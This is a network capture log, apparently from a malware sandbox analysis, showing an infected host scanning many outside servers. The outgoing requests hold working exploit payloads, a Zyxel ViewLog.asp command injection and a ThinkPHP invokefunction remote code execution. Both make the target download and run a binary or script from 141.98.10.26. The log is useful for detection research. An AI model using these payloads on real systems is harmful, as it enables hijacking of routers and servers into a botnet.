
Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.555979013 CET	4478	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
191	192.168.2.23	41664	95.163.51.106	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.684766054 CET	4485	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:26.888183117 CET	4497	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.2 Date: Wed, 22 Nov 2023 07:38:26 GMT Content-Type: text/html Content-Length: 157 Connection: close X-Host: cld-uploader7 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
192	192.168.2.23	36152	95.175.23.228	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.713988066 CET	4488	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:26.934133053 CET	4499	IN	HTTP/1.1 500 Server Error Content-Length: 48 Date: Wed, 22 Nov 2023 07:38:26 GMT Connection: close
Nov 22, 2023 08:38:26.934144020 CET	4499	IN	Data Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 43 6c 69 65 6e 74 20 63 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e Data Ascii: Error 500: Server ErrorClient closed connection

Session ID	Source IP	Source Port	Destination IP	Destination Port
193	192.168.2.23	49358	31.136.113.74	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.730773926 CET	4489	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:27.310719967 CET	4513	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:28.430588007 CET	4658	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:30.670231104 CET	4944	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:35.277582884 CET	5468	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:44.236313105 CET	6566	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.433701038 CET	9026	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:40.292548895 CET	13380	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
194	192.168.2.23	36640	62.242.174.49	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.742599010 CET	4489	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
195	192.168.2.23	59306	95.179.196.33	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.756151915 CET	4490	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:26.990133047 CET	4500	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:26 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
196	192.168.2.23	37926	95.86.74.79	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.786689997 CET	4491	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
197	192.168.2.23	59258	31.56.17.79	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.900510073 CET	4498	IN	HTTP/1.1 400 Bad Request Server: micro_httpd Cache-Control: no-cache Date: Fri, 07 Jan 2000 03:07:12 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
198	192.168.2.23	36174	95.175.23.228	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:27.154026031 CET	4502	IN	HTTP/1.1 500 Server Error Content-Length: 48 Date: Wed, 22 Nov 2023 07:38:26 GMT Connection: close
Nov 22, 2023 08:38:27.154036999 CET	4502	IN	Data Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 43 6c 69 65 6e 74 20 63 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e Data Ascii: Error 500: Server ErrorClient closed connection

Session ID	Source IP	Source Port	Destination IP	Destination Port
199	192.168.2.23	58132	95.100.139.78	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:28.138683081 CET	4613	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:28.338219881 CET	4657	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:28 GMT Date: Wed, 22 Nov 2023 07:38:28 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 66 38 36 62 61 35 64 26 23 34 36 3b 31 37 30 30 36 33 38 37 30 38 26 23 34 36 3b 65 61 36 31 61 62 38 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.df86ba5d.1700638708.ea61ab84</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
200	192.168.2.23	36026	95.101.163.29	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:28.297875881 CET	4656	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:28.454216003 CET	4659	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:28 GMT Date: Wed, 22 Nov 2023 07:38:28 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 34 34 64 64 62 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 37 30 38 26 23 34 36 3b 35 39 38 32 39 36 61 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.844ddb17.1700638708.598296a5</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
201	192.168.2.23	48740	95.217.2.155	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:28.333749056 CET	4656	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:28.529217958 CET	4661	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 316 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6c 69 63 65 6e 73 65 2e 73 74 61 72 6d 65 64 69 61 66 69 6c 6d 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at license.starmediafilm.ru Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
202	192.168.2.23	41560	112.175.89.106	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:29.828515053 CET	4840	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:31.342288971 CET	5042	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:33.134025097 CET	5220	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:36.813400984 CET	5620	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:43.980489969 CET	6550	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.314409971 CET	8315	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:28.006150961 CET	11906	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
203	192.168.2.23	45822	112.156.253.251	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:29.841252089 CET	4841	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:30.189815998 CET	4846	IN	HTTP/1.0 404 Not Found Content-type: text/html Date: Wed, 22 Nov 2023 07:38:30 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL was not found</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
204	192.168.2.23	32898	112.126.231.224	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:29.850696087 CET	4842	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:30.166784048 CET	4846	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:34:52 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; 